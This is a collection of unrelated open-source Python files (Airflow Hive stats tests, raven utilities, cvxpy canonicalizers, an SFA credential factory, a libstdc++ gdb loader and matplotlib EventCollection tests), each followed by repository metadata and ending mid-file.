self.module_logger.warning("Couldn't dump to file; details: " + err.__str__())
def process(self, input):
"""process()
Main action.
"""
self.module_logger.debug("Raw input: " + str(input))
self.dump_to_file(input)
def main(controller_reference, parameter_dictionary, module_logger):
dumper_class = DumperClass(controller_reference, parameter_dictionary, module_logger)
return dumper_class
if __name__ == "__main__":
print "Warning: This module is not intended to be executed directly. Only do this for test purposes."
|
pkrebs/WIDPS
|
fw_modules/module_dumper.py
|
Python
|
gpl-2.0
| 3,313 | 0.00815 |
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import os
import re
import unittest
from collections import OrderedDict
from unittest.mock import patch
import pytest
from airflow.exceptions import AirflowException
from airflow.providers.apache.hive.operators.hive_stats import HiveStatsCollectionOperator
from tests.providers.apache.hive import DEFAULT_DATE, DEFAULT_DATE_DS, TestHiveEnvironment
from tests.test_utils.mock_hooks import MockHiveMetastoreHook, MockMySqlHook, MockPrestoHook
class _FakeCol:
def __init__(self, col_name, col_type):
self.name = col_name
self.type = col_type
fake_col = _FakeCol('col', 'string')
class TestHiveStatsCollectionOperator(TestHiveEnvironment):
def setUp(self):
self.kwargs = dict(
table='table',
partition=dict(col='col', value='value'),
metastore_conn_id='metastore_conn_id',
presto_conn_id='presto_conn_id',
mysql_conn_id='mysql_conn_id',
task_id='test_hive_stats_collection_operator',
)
super().setUp()
def test_get_default_exprs(self):
col = 'col'
default_exprs = HiveStatsCollectionOperator(**self.kwargs).get_default_exprs(col, None)
assert default_exprs == {(col, 'non_null'): f'COUNT({col})'}
def test_get_default_exprs_excluded_cols(self):
col = 'excluded_col'
self.kwargs.update(dict(excluded_columns=[col]))
default_exprs = HiveStatsCollectionOperator(**self.kwargs).get_default_exprs(col, None)
assert default_exprs == {}
def test_get_default_exprs_number(self):
col = 'col'
for col_type in ['double', 'int', 'bigint', 'float']:
default_exprs = HiveStatsCollectionOperator(**self.kwargs).get_default_exprs(col, col_type)
assert default_exprs == {
(col, 'avg'): f'AVG({col})',
(col, 'max'): f'MAX({col})',
(col, 'min'): f'MIN({col})',
(col, 'non_null'): f'COUNT({col})',
(col, 'sum'): f'SUM({col})',
}
def test_get_default_exprs_boolean(self):
col = 'col'
col_type = 'boolean'
default_exprs = HiveStatsCollectionOperator(**self.kwargs).get_default_exprs(col, col_type)
assert default_exprs == {
(col, 'false'): f'SUM(CASE WHEN NOT {col} THEN 1 ELSE 0 END)',
(col, 'non_null'): f'COUNT({col})',
(col, 'true'): f'SUM(CASE WHEN {col} THEN 1 ELSE 0 END)',
}
def test_get_default_exprs_string(self):
col = 'col'
col_type = 'string'
default_exprs = HiveStatsCollectionOperator(**self.kwargs).get_default_exprs(col, col_type)
assert default_exprs == {
(col, 'approx_distinct'): f'APPROX_DISTINCT({col})',
(col, 'len'): f'SUM(CAST(LENGTH({col}) AS BIGINT))',
(col, 'non_null'): f'COUNT({col})',
}
@patch('airflow.providers.apache.hive.operators.hive_stats.json.dumps')
@patch('airflow.providers.apache.hive.operators.hive_stats.MySqlHook')
@patch('airflow.providers.apache.hive.operators.hive_stats.PrestoHook')
@patch('airflow.providers.apache.hive.operators.hive_stats.HiveMetastoreHook')
def test_execute(self, mock_hive_metastore_hook, mock_presto_hook, mock_mysql_hook, mock_json_dumps):
mock_hive_metastore_hook.return_value.get_table.return_value.sd.cols = [fake_col]
mock_mysql_hook.return_value.get_records.return_value = False
hive_stats_collection_operator = HiveStatsCollectionOperator(**self.kwargs)
hive_stats_collection_operator.execute(context={})
mock_hive_metastore_hook.assert_called_once_with(
metastore_conn_id=hive_stats_collection_operator.metastore_conn_id
)
mock_hive_metastore_hook.return_value.get_table.assert_called_once_with(
table_name=hive_stats_collection_operator.table
)
mock_presto_hook.assert_called_once_with(presto_conn_id=hive_stats_collection_operator.presto_conn_id)
mock_mysql_hook.assert_called_once_with(hive_stats_collection_operator.mysql_conn_id)
mock_json_dumps.assert_called_once_with(hive_stats_collection_operator.partition, sort_keys=True)
field_types = {
col.name: col.type for col in mock_hive_metastore_hook.return_value.get_table.return_value.sd.cols
}
exprs = {('', 'count'): 'COUNT(*)'}
for col, col_type in list(field_types.items()):
exprs.update(hive_stats_collection_operator.get_default_exprs(col, col_type))
exprs = OrderedDict(exprs)
rows = [
(
hive_stats_collection_operator.ds,
hive_stats_collection_operator.dttm,
hive_stats_collection_operator.table,
mock_json_dumps.return_value,
)
+ (r[0][0], r[0][1], r[1])
for r in zip(exprs, mock_presto_hook.return_value.get_first.return_value)
]
mock_mysql_hook.return_value.insert_rows.assert_called_once_with(
table='hive_stats',
rows=rows,
target_fields=[
'ds',
'dttm',
'table_name',
'partition_repr',
'col',
'metric',
'value',
],
)
@patch('airflow.providers.apache.hive.operators.hive_stats.json.dumps')
@patch('airflow.providers.apache.hive.operators.hive_stats.MySqlHook')
@patch('airflow.providers.apache.hive.operators.hive_stats.PrestoHook')
@patch('airflow.providers.apache.hive.operators.hive_stats.HiveMetastoreHook')
def test_execute_with_assignment_func(
self, mock_hive_metastore_hook, mock_presto_hook, mock_mysql_hook, mock_json_dumps
):
def assignment_func(col, _):
return {(col, 'test'): f'TEST({col})'}
self.kwargs.update(dict(assignment_func=assignment_func))
mock_hive_metastore_hook.return_value.get_table.return_value.sd.cols = [fake_col]
mock_mysql_hook.return_value.get_records.return_value = False
hive_stats_collection_operator = HiveStatsCollectionOperator(**self.kwargs)
hive_stats_collection_operator.execute(context={})
field_types = {
col.name: col.type for col in mock_hive_metastore_hook.return_value.get_table.return_value.sd.cols
}
exprs = {('', 'count'): 'COUNT(*)'}
for col, col_type in list(field_types.items()):
exprs.update(hive_stats_collection_operator.assignment_func(col, col_type))
exprs = OrderedDict(exprs)
rows = [
(
hive_stats_collection_operator.ds,
hive_stats_collection_operator.dttm,
hive_stats_collection_operator.table,
mock_json_dumps.return_value,
)
+ (r[0][0], r[0][1], r[1])
for r in zip(exprs, mock_presto_hook.return_value.get_first.return_value)
]
mock_mysql_hook.return_value.insert_rows.assert_called_once_with(
table='hive_stats',
rows=rows,
target_fields=[
'ds',
'dttm',
'table_name',
'partition_repr',
'col',
'metric',
'value',
],
)
@patch('airflow.providers.apache.hive.operators.hive_stats.json.dumps')
@patch('airflow.providers.apache.hive.operators.hive_stats.MySqlHook')
@patch('airflow.providers.apache.hive.operators.hive_stats.PrestoHook')
@patch('airflow.providers.apache.hive.operators.hive_stats.HiveMetastoreHook')
def test_execute_with_assignment_func_no_return_value(
self, mock_hive_metastore_hook, mock_presto_hook, mock_mysql_hook, mock_json_dumps
):
def assignment_func(_, __):
pass
self.kwargs.update(dict(assignment_func=assignment_func))
mock_hive_metastore_hook.return_value.get_table.return_value.sd.cols = [fake_col]
mock_mysql_hook.return_value.get_records.return_value = False
hive_stats_collection_operator = HiveStatsCollectionOperator(**self.kwargs)
hive_stats_collection_operator.execute(context={})
field_types = {
col.name: col.type for col in mock_hive_metastore_hook.return_value.get_table.return_value.sd.cols
}
exprs = {('', 'count'): 'COUNT(*)'}
for col, col_type in list(field_types.items()):
exprs.update(hive_stats_collection_operator.get_default_exprs(col, col_type))
exprs = OrderedDict(exprs)
rows = [
(
hive_stats_collection_operator.ds,
hive_stats_collection_operator.dttm,
hive_stats_collection_operator.table,
mock_json_dumps.return_value,
)
+ (r[0][0], r[0][1], r[1])
for r in zip(exprs, mock_presto_hook.return_value.get_first.return_value)
]
mock_mysql_hook.return_value.insert_rows.assert_called_once_with(
table='hive_stats',
rows=rows,
target_fields=[
'ds',
'dttm',
'table_name',
'partition_repr',
'col',
'metric',
'value',
],
)
@patch('airflow.providers.apache.hive.operators.hive_stats.MySqlHook')
@patch('airflow.providers.apache.hive.operators.hive_stats.PrestoHook')
@patch('airflow.providers.apache.hive.operators.hive_stats.HiveMetastoreHook')
def test_execute_no_query_results(self, mock_hive_metastore_hook, mock_presto_hook, mock_mysql_hook):
mock_hive_metastore_hook.return_value.get_table.return_value.sd.cols = [fake_col]
mock_mysql_hook.return_value.get_records.return_value = False
mock_presto_hook.return_value.get_first.return_value = None
with pytest.raises(AirflowException):
HiveStatsCollectionOperator(**self.kwargs).execute(context={})
@patch('airflow.providers.apache.hive.operators.hive_stats.json.dumps')
@patch('airflow.providers.apache.hive.operators.hive_stats.MySqlHook')
@patch('airflow.providers.apache.hive.operators.hive_stats.PrestoHook')
@patch('airflow.providers.apache.hive.operators.hive_stats.HiveMetastoreHook')
def test_execute_delete_previous_runs_rows(
self, mock_hive_metastore_hook, mock_presto_hook, mock_mysql_hook, mock_json_dumps
):
mock_hive_metastore_hook.return_value.get_table.return_value.sd.cols = [fake_col]
mock_mysql_hook.return_value.get_records.return_value = True
hive_stats_collection_operator = HiveStatsCollectionOperator(**self.kwargs)
hive_stats_collection_operator.execute(context={})
sql = f"""
DELETE FROM hive_stats
WHERE
table_name='{hive_stats_collection_operator.table}' AND
partition_repr='{mock_json_dumps.return_value}' AND
dttm='{hive_stats_collection_operator.dttm}';
"""
mock_mysql_hook.return_value.run.assert_called_once_with(sql)
@unittest.skipIf(
'AIRFLOW_RUNALL_TESTS' not in os.environ, "Skipped because AIRFLOW_RUNALL_TESTS is not set"
)
@patch(
'airflow.providers.apache.hive.operators.hive_stats.HiveMetastoreHook',
side_effect=MockHiveMetastoreHook,
)
def test_runs_for_hive_stats(self, mock_hive_metastore_hook):
mock_mysql_hook = MockMySqlHook()
mock_presto_hook = MockPrestoHook()
with patch(
'airflow.providers.apache.hive.operators.hive_stats.PrestoHook', return_value=mock_presto_hook
):
with patch(
'airflow.providers.apache.hive.operators.hive_stats.MySqlHook', return_value=mock_mysql_hook
):
op = HiveStatsCollectionOperator(
task_id='hive_stats_check',
table="airflow.static_babynames_partitioned",
partition={'ds': DEFAULT_DATE_DS},
dag=self.dag,
)
op.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
select_count_query = (
"SELECT COUNT(*) AS __count "
"FROM airflow.static_babynames_partitioned "
"WHERE ds = '2015-01-01';"
)
mock_presto_hook.get_first.assert_called_with(hql=select_count_query)
expected_stats_select_query = (
"SELECT 1 "
"FROM hive_stats "
"WHERE table_name='airflow.static_babynames_partitioned' "
" AND partition_repr='{\"ds\": \"2015-01-01\"}' "
" AND dttm='2015-01-01T00:00:00+00:00' "
"LIMIT 1;"
)
raw_stats_select_query = mock_mysql_hook.get_records.call_args_list[0][0][0]
actual_stats_select_query = re.sub(r'\s{2,}', ' ', raw_stats_select_query).strip()
assert expected_stats_select_query == actual_stats_select_query
insert_rows_val = [
(
'2015-01-01',
'2015-01-01T00:00:00+00:00',
'airflow.static_babynames_partitioned',
'{"ds": "2015-01-01"}',
'',
'count',
['val_0', 'val_1'],
)
]
mock_mysql_hook.insert_rows.assert_called_with(
table='hive_stats',
rows=insert_rows_val,
target_fields=[
'ds',
'dttm',
'table_name',
'partition_repr',
'col',
'metric',
'value',
],
)
|
apache/incubator-airflow
|
tests/providers/apache/hive/operators/test_hive_stats.py
|
Python
|
apache-2.0
| 14,564 | 0.003158 |
"""
raven.utils
~~~~~~~~~~~~~~~~~~~
:copyright: (c) 2010 by the Sentry Team, see AUTHORS for more details.
:license: BSD, see LICENSE for more details.
"""
import hashlib
import hmac
import logging
try:
import pkg_resources
except ImportError:
pkg_resources = None
import sys
import raven
def construct_checksum(level=logging.ERROR, class_name='', traceback='', message='', **kwargs):
checksum = hashlib.md5(str(level))
checksum.update(class_name or '')
if 'data' in kwargs and kwargs['data'] and '__sentry__' in kwargs['data'] and 'frames' in kwargs['data']['__sentry__']:
frames = kwargs['data']['__sentry__']['frames']
for frame in frames:
checksum.update(frame['module'])
checksum.update(frame['function'])
    elif traceback:
        traceback = '\n'.join(traceback.split('\n')[:-3])
        checksum.update(traceback)
elif message:
if isinstance(message, unicode):
message = message.encode('utf-8', 'replace')
checksum.update(message)
return checksum.hexdigest()
def varmap(func, var, context=None):
if context is None:
context = {}
objid = id(var)
if objid in context:
return func('<...>')
context[objid] = 1
if isinstance(var, dict):
ret = dict((k, varmap(func, v, context)) for k, v in var.iteritems())
elif isinstance(var, (list, tuple)):
ret = [varmap(func, f, context) for f in var]
else:
ret = func(var)
del context[objid]
return ret
# We store a cache of module_name->version string to avoid
# continuous imports and lookups of modules
_VERSION_CACHE = {}
def get_versions(module_list=None):
if not module_list:
return {}
ext_module_list = set()
for m in module_list:
parts = m.split('.')
ext_module_list.update('.'.join(parts[:idx]) for idx in xrange(1, len(parts)+1))
versions = {}
for module_name in ext_module_list:
if module_name not in _VERSION_CACHE:
try:
__import__(module_name)
except ImportError:
continue
app = sys.modules[module_name]
if hasattr(app, 'get_version'):
get_version = app.get_version
if callable(get_version):
version = get_version()
else:
version = get_version
elif hasattr(app, 'VERSION'):
version = app.VERSION
elif hasattr(app, '__version__'):
version = app.__version__
elif pkg_resources:
# pull version from pkg_resources if distro exists
try:
version = pkg_resources.get_distribution(module_name).version
except pkg_resources.DistributionNotFound:
version = None
else:
version = None
if isinstance(version, (list, tuple)):
version = '.'.join(str(o) for o in version)
_VERSION_CACHE[module_name] = version
else:
version = _VERSION_CACHE[module_name]
if version is None:
continue
versions[module_name] = version
return versions
def get_signature(key, message, timestamp):
return hmac.new(key, '%s %s' % (timestamp, message), hashlib.sha1).hexdigest()
def get_auth_header(signature, timestamp, client):
return 'Sentry sentry_signature=%s, sentry_timestamp=%s, raven=%s' % (
signature,
timestamp,
raven.VERSION,
)
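# --- Illustrative sketch, not part of the original module -------------------
# varmap() applies a function to every leaf of a nested structure while
# guarding against reference cycles via the id()-keyed context dict; the
# sample data below is made up.  (Like the rest of this module, the demo
# targets Python 2, since varmap() relies on dict.iteritems().)
if __name__ == '__main__':
    nested = {'user': {'name': 'alice', 'tags': ['db', 'web']}, 'count': 3}
    print(varmap(lambda leaf: str(leaf).upper(), nested))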
|
mitsuhiko/raven
|
raven/utils/__init__.py
|
Python
|
bsd-3-clause
| 3,540 | 0.003107 |
"""
Copyright 2017 Robin Verschueren
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from cvxpy.atoms import (bmat, cumsum, diag, kron, conv,
abs, reshape, trace,
upper_tri, conj, imag, real,
norm1, norm_inf, Pnorm,
sigma_max, lambda_max, lambda_sum_largest,
log_det, QuadForm, MatrixFrac, quad_over_lin)
from cvxpy.atoms.affine.promote import Promote
from cvxpy.atoms.affine.sum import Sum
from cvxpy.atoms.affine.add_expr import AddExpression
from cvxpy.atoms.affine.index import index, special_index
from cvxpy.atoms.affine.unary_operators import NegExpression
from cvxpy.atoms.affine.transpose import transpose
from cvxpy.atoms.affine.hstack import Hstack
from cvxpy.atoms.affine.vstack import Vstack
from cvxpy.atoms.norm_nuc import normNuc
from cvxpy.atoms.affine.binary_operators import (MulExpression,
multiply,
DivExpression)
from cvxpy.expressions.constants import Constant, Parameter
from cvxpy.expressions.variable import Variable
from cvxpy.constraints import NonPos, SOC, PSD, Zero
from cvxpy.reductions.complex2real.atom_canonicalizers.abs_canon import abs_canon
from cvxpy.reductions.complex2real.atom_canonicalizers.aff_canon import (separable_canon,
real_canon,
imag_canon,
conj_canon,
binary_canon)
from cvxpy.reductions.complex2real.atom_canonicalizers.pnorm_canon import pnorm_canon
from cvxpy.reductions.complex2real.atom_canonicalizers.matrix_canon import (
hermitian_canon, quad_canon, lambda_sum_largest_canon, norm_nuc_canon, matrix_frac_canon,
quad_over_lin_canon)
from cvxpy.reductions.complex2real.atom_canonicalizers.nonpos_canon import nonpos_canon
from cvxpy.reductions.complex2real.atom_canonicalizers.psd_canon import psd_canon
from cvxpy.reductions.complex2real.atom_canonicalizers.soc_canon import soc_canon
from cvxpy.reductions.complex2real.atom_canonicalizers.variable_canon import variable_canon
from cvxpy.reductions.complex2real.atom_canonicalizers.constant_canon import constant_canon
from cvxpy.reductions.complex2real.atom_canonicalizers.param_canon import param_canon
from cvxpy.reductions.complex2real.atom_canonicalizers.zero_canon import zero_canon
CANON_METHODS = {
AddExpression: separable_canon,
bmat: separable_canon,
cumsum: separable_canon,
diag: separable_canon,
Hstack: separable_canon,
index: separable_canon,
special_index: separable_canon,
Promote: separable_canon,
reshape: separable_canon,
Sum: separable_canon,
trace: separable_canon,
transpose: separable_canon,
NegExpression: separable_canon,
upper_tri: separable_canon,
Vstack: separable_canon,
conv: binary_canon,
DivExpression: binary_canon,
kron: binary_canon,
MulExpression: binary_canon,
multiply: binary_canon,
conj: conj_canon,
imag: imag_canon,
real: real_canon,
Variable: variable_canon,
Constant: constant_canon,
Parameter: param_canon,
NonPos: nonpos_canon,
PSD: psd_canon,
SOC: soc_canon,
Zero: zero_canon,
abs: abs_canon,
norm1: pnorm_canon,
norm_inf: pnorm_canon,
Pnorm: pnorm_canon,
lambda_max: hermitian_canon,
log_det: norm_nuc_canon,
normNuc: norm_nuc_canon,
sigma_max: hermitian_canon,
QuadForm: quad_canon,
quad_over_lin: quad_over_lin_canon,
MatrixFrac: matrix_frac_canon,
lambda_sum_largest: lambda_sum_largest_canon,
}
|
SteveDiamond/cvxpy
|
cvxpy/reductions/complex2real/atom_canonicalizers/__init__.py
|
Python
|
gpl-3.0
| 4,337 | 0.003459 |
#----------------------------------------------------------------------
# Copyright (c) 2014 Raytheon BBN Technologies
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and/or hardware specification (the "Work") to
# deal in the Work without restriction, including without limitation the
# rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Work, and to permit persons to whom the Work
# is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Work.
#
# THE WORK IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT
# HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE WORK OR THE USE OR OTHER DEALINGS
# IN THE WORK.
#----------------------------------------------------------------------
from sfa.util.sfalogging import logger
from sfa.trust.credential import Credential
from sfa.trust.abac_credential import ABACCredential
import json
import re
# Factory for creating credentials of different sorts by type.
# Specifically, this factory can create standard SFA credentials
# and ABAC credentials from XML strings based on their identifying content
class CredentialFactory:
UNKNOWN_CREDENTIAL_TYPE = 'geni_unknown'
# Static Credential class method to determine the type of a credential
# string depending on its contents
@staticmethod
def getType(credString):
credString_nowhitespace = re.sub('\s', '', credString)
if credString_nowhitespace.find('<type>abac</type>') > -1:
return ABACCredential.ABAC_CREDENTIAL_TYPE
elif credString_nowhitespace.find('<type>privilege</type>') > -1:
return Credential.SFA_CREDENTIAL_TYPE
else:
st = credString_nowhitespace.find('<type>')
end = credString_nowhitespace.find('</type>', st)
return credString_nowhitespace[st + len('<type>'):end]
# return CredentialFactory.UNKNOWN_CREDENTIAL_TYPE
# Static Credential class method to create the appropriate credential
# (SFA or ABAC) depending on its type
@staticmethod
def createCred(credString=None, credFile=None):
if not credString and not credFile:
raise Exception("CredentialFactory.createCred called with no argument")
if credFile:
try:
credString = open(credFile).read()
except Exception, e:
logger.info("Error opening credential file %s: %s" % credFile, e)
return None
# Try to treat the file as JSON, getting the cred_type from the struct
try:
credO = json.loads(credString, encoding='ascii')
if credO.has_key('geni_value') and credO.has_key('geni_type'):
cred_type = credO['geni_type']
credString = credO['geni_value']
except Exception, e:
# It wasn't a struct. So the credString is XML. Pull the type directly from the string
logger.debug("Credential string not JSON: %s" % e)
cred_type = CredentialFactory.getType(credString)
if cred_type == Credential.SFA_CREDENTIAL_TYPE:
try:
cred = Credential(string=credString)
return cred
except Exception, e:
if credFile:
msg = "credString started: %s" % credString[:50]
raise Exception("%s not a parsable SFA credential: %s. " % (credFile, e) + msg)
else:
raise Exception("SFA Credential not parsable: %s. Cred start: %s..." % (e, credString[:50]))
elif cred_type == ABACCredential.ABAC_CREDENTIAL_TYPE:
try:
cred = ABACCredential(string=credString)
return cred
except Exception, e:
if credFile:
raise Exception("%s not a parsable ABAC credential: %s" % (credFile, e))
else:
raise Exception("ABAC Credential not parsable: %s. Cred start: %s..." % (e, credString[:50]))
else:
raise Exception("Unknown credential type '%s'" % cred_type)
if __name__ == "__main__":
c2 = open('/tmp/sfa.xml').read()
cred1 = CredentialFactory.createCred(credFile='/tmp/cred.xml')
cred2 = CredentialFactory.createCred(credString=c2)
print "C1 = %s" % cred1
print "C2 = %s" % cred2
c1s = cred1.dump_string()
print "C1 = %s" % c1s
# print "C2 = %s" % cred2.dump_string()
|
yippeecw/sfa
|
sfa/trust/credential_factory.py
|
Python
|
mit
| 5,023 | 0.002588 |
# -*- python -*-
# Copyright (C) 2009-2017 Free Software Foundation, Inc.
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import sys
import gdb
import os
import os.path
pythondir = '/Users/build/work/GCC-7-build/install-native/share/gcc-arm-none-eabi'
libdir = '/Users/build/work/GCC-7-build/install-native/arm-none-eabi/lib/thumb/v7-ar'
# This file might be loaded when there is no current objfile. This
# can happen if the user loads it manually. In this case we don't
# update sys.path; instead we just hope the user managed to do that
# beforehand.
if gdb.current_objfile () is not None:
# Update module path. We want to find the relative path from libdir
# to pythondir, and then we want to apply that relative path to the
# directory holding the objfile with which this file is associated.
# This preserves relocatability of the gcc tree.
# Do a simple normalization that removes duplicate separators.
pythondir = os.path.normpath (pythondir)
libdir = os.path.normpath (libdir)
prefix = os.path.commonprefix ([libdir, pythondir])
# In some bizarre configuration we might have found a match in the
# middle of a directory name.
if prefix[-1] != '/':
prefix = os.path.dirname (prefix) + '/'
# Strip off the prefix.
pythondir = pythondir[len (prefix):]
libdir = libdir[len (prefix):]
# Compute the ".."s needed to get from libdir to the prefix.
dotdots = ('..' + os.sep) * len (libdir.split (os.sep))
objfile = gdb.current_objfile ().filename
dir_ = os.path.join (os.path.dirname (objfile), dotdots, pythondir)
if not dir_ in sys.path:
sys.path.insert(0, dir_)
# Call a function as a plain import would not execute body of the included file
# on repeated reloads of this object file.
from libstdcxx.v6 import register_libstdcxx_printers
register_libstdcxx_printers(gdb.current_objfile())
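# Worked example of the relocation arithmetic above, using the paths baked
# into this file: the common prefix of libdir and pythondir is
# '/Users/build/work/GCC-7-build/install-native/', so after stripping it
#   pythondir -> 'share/gcc-arm-none-eabi'
#   libdir    -> 'arm-none-eabi/lib/thumb/v7-ar'   (4 components)
# giving dotdots = '../../../../'; the printers are therefore loaded from
# <dir of libstdc++.a>/../../../../share/gcc-arm-none-eabi, wherever the
# toolchain has been relocated to.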
|
jocelynmass/nrf51
|
toolchain/arm_cm0/arm-none-eabi/lib/thumb/v7-ar/libstdc++.a-gdb.py
|
Python
|
gpl-2.0
| 2,483 | 0.006444 |
"""
Tests specific to the collections module.
"""
from __future__ import (absolute_import, division, print_function,
unicode_literals)
import six
import io
from nose.tools import assert_equal
import numpy as np
from numpy.testing import assert_array_equal, assert_array_almost_equal
from nose.plugins.skip import SkipTest
import matplotlib.pyplot as plt
import matplotlib.collections as mcollections
import matplotlib.transforms as mtransforms
from matplotlib.collections import Collection, EventCollection
from matplotlib.testing.decorators import cleanup, image_comparison
def generate_EventCollection_plot():
'''
generate the initial collection and plot it
'''
positions = np.array([0., 1., 2., 3., 5., 8., 13., 21.])
extra_positions = np.array([34., 55., 89.])
orientation = 'horizontal'
lineoffset = 1
linelength = .5
linewidth = 2
color = [1, 0, 0, 1]
linestyle = 'solid'
antialiased = True
coll = EventCollection(positions,
orientation=orientation,
lineoffset=lineoffset,
linelength=linelength,
linewidth=linewidth,
color=color,
linestyle=linestyle,
antialiased=antialiased
)
fig = plt.figure()
splt = fig.add_subplot(1, 1, 1)
splt.add_collection(coll)
splt.set_title('EventCollection: default')
props = {'positions': positions,
'extra_positions': extra_positions,
'orientation': orientation,
'lineoffset': lineoffset,
'linelength': linelength,
'linewidth': linewidth,
'color': color,
'linestyle': linestyle,
'antialiased': antialiased
}
splt.set_xlim(-1, 22)
splt.set_ylim(0, 2)
return splt, coll, props
@image_comparison(baseline_images=['EventCollection_plot__default'])
def test__EventCollection__get_segments():
'''
check to make sure the default segments have the correct coordinates
'''
_, coll, props = generate_EventCollection_plot()
check_segments(coll,
props['positions'],
props['linelength'],
props['lineoffset'],
props['orientation'])
@cleanup
def test__EventCollection__get_positions():
'''
check to make sure the default positions match the input positions
'''
_, coll, props = generate_EventCollection_plot()
np.testing.assert_array_equal(props['positions'], coll.get_positions())
@cleanup
def test__EventCollection__get_orientation():
'''
check to make sure the default orientation matches the input
orientation
'''
_, coll, props = generate_EventCollection_plot()
assert_equal(props['orientation'], coll.get_orientation())
@cleanup
def test__EventCollection__is_horizontal():
'''
check to make sure the default orientation matches the input
orientation
'''
_, coll, _ = generate_EventCollection_plot()
assert_equal(True, coll.is_horizontal())
@cleanup
def test__EventCollection__get_linelength():
'''
check to make sure the default linelength matches the input linelength
'''
_, coll, props = generate_EventCollection_plot()
assert_equal(props['linelength'], coll.get_linelength())
@cleanup
def test__EventCollection__get_lineoffset():
'''
check to make sure the default lineoffset matches the input lineoffset
'''
_, coll, props = generate_EventCollection_plot()
assert_equal(props['lineoffset'], coll.get_lineoffset())
@cleanup
def test__EventCollection__get_linestyle():
'''
check to make sure the default linestyle matches the input linestyle
'''
_, coll, _ = generate_EventCollection_plot()
assert_equal(coll.get_linestyle(), [(None, None)])
@cleanup
def test__EventCollection__get_color():
'''
check to make sure the default color matches the input color
'''
_, coll, props = generate_EventCollection_plot()
np.testing.assert_array_equal(props['color'], coll.get_color())
check_allprop_array(coll.get_colors(), props['color'])
@image_comparison(baseline_images=['EventCollection_plot__set_positions'])
def test__EventCollection__set_positions():
'''
check to make sure set_positions works properly
'''
splt, coll, props = generate_EventCollection_plot()
new_positions = np.hstack([props['positions'], props['extra_positions']])
coll.set_positions(new_positions)
np.testing.assert_array_equal(new_positions, coll.get_positions())
check_segments(coll, new_positions,
props['linelength'],
props['lineoffset'],
props['orientation'])
splt.set_title('EventCollection: set_positions')
splt.set_xlim(-1, 90)
@image_comparison(baseline_images=['EventCollection_plot__add_positions'])
def test__EventCollection__add_positions():
'''
check to make sure add_positions works properly
'''
splt, coll, props = generate_EventCollection_plot()
new_positions = np.hstack([props['positions'],
props['extra_positions'][0]])
coll.add_positions(props['extra_positions'][0])
np.testing.assert_array_equal(new_positions, coll.get_positions())
check_segments(coll,
new_positions,
props['linelength'],
props['lineoffset'],
props['orientation'])
splt.set_title('EventCollection: add_positions')
splt.set_xlim(-1, 35)
@image_comparison(baseline_images=['EventCollection_plot__append_positions'])
def test__EventCollection__append_positions():
'''
check to make sure append_positions works properly
'''
splt, coll, props = generate_EventCollection_plot()
new_positions = np.hstack([props['positions'],
props['extra_positions'][2]])
coll.append_positions(props['extra_positions'][2])
np.testing.assert_array_equal(new_positions, coll.get_positions())
check_segments(coll,
new_positions,
props['linelength'],
props['lineoffset'],
props['orientation'])
splt.set_title('EventCollection: append_positions')
splt.set_xlim(-1, 90)
@image_comparison(baseline_images=['EventCollection_plot__extend_positions'])
def test__EventCollection__extend_positions():
'''
check to make sure extend_positions works properly
'''
splt, coll, props = generate_EventCollection_plot()
new_positions = np.hstack([props['positions'],
props['extra_positions'][1:]])
coll.extend_positions(props['extra_positions'][1:])
np.testing.assert_array_equal(new_positions, coll.get_positions())
check_segments(coll,
new_positions,
props['linelength'],
props['lineoffset'],
props['orientation'])
splt.set_title('EventCollection: extend_positions')
splt.set_xlim(-1, 90)
@image_comparison(baseline_images=['EventCollection_plot__switch_orientation'])
def test__EventCollection__switch_orientation():
'''
check to make sure switch_orientation works properly
'''
splt, coll, props = generate_EventCollection_plot()
new_orientation = 'vertical'
coll.switch_orientation()
assert_equal(new_orientation, coll.get_orientation())
assert_equal(False, coll.is_horizontal())
new_positions = coll.get_positions()
check_segments(coll,
new_positions,
props['linelength'],
props['lineoffset'], new_orientation)
splt.set_title('EventCollection: switch_orientation')
splt.set_ylim(-1, 22)
splt.set_xlim(0, 2)
@image_comparison(
baseline_images=['EventCollection_plot__switch_orientation__2x'])
def test__EventCollection__switch_orientation_2x():
'''
check to make sure calling switch_orientation twice sets the
orientation back to the default
'''
splt, coll, props = generate_EventCollection_plot()
coll.switch_orientation()
coll.switch_orientation()
new_positions = coll.get_positions()
assert_equal(props['orientation'], coll.get_orientation())
assert_equal(True, coll.is_horizontal())
np.testing.assert_array_equal(props['positions'], new_positions)
check_segments(coll,
